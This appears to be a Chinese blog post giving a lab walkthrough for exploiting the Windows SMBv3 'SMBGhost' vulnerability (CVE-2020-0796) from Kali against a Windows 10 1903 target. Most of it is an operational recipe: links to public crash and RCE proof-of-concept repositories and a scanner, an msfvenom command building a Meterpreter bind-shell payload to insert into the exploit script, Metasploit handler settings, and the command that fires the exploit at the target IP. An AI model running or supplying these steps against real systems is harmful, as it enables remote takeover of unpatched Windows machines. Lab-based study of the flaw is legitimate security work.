美文网首页
Windows SMBv3 蠕虫级RCE漏洞(CVE-2020-

Windows SMBv3 蠕虫级RCE漏洞(CVE-2020-

作者: migrate_ | 来源:发表于2020-06-06 13:16 被阅读0次

    测试环境及工具

    • kali :192.168.1.106
    • 靶机:192.168.1.107
    1.jpg 2.jpg
    靶机下载地址:
    ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
    
    蓝屏的poc
    https://github.com/eerykitty/CVE-2020-0796-PoC
    奇安信的检查工具 地址http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
    
    本次利用的脚本https://github.com/chompie1337/SMBGhost_RCE_PoC.git
    
    • 使用kali生成利用脚本(设置kali监听地址)
    msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=(kali ip) LPORT=1234 -f py -o test.py
    然后把生成的脚本内容替换到exploit的USER_PAYLOAD的内容
    
    3.jpg 4.jpg 5.jpg
    • 进入msf监听
    进入metasploit
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    set lport 1234
    set rhost 192.168.1.107  (靶机IP)
    show options 查看
    exploit
    
    • 运行exploit脚本
    运行
    python3 exploit.py -ip  192.168.1.107
    
    7.jpg

    相关文章

      网友评论

          本文标题:Windows SMBv3 蠕虫级RCE漏洞(CVE-2020-

          本文链接:https://www.haomeiwen.com/subject/uqxxtktx.html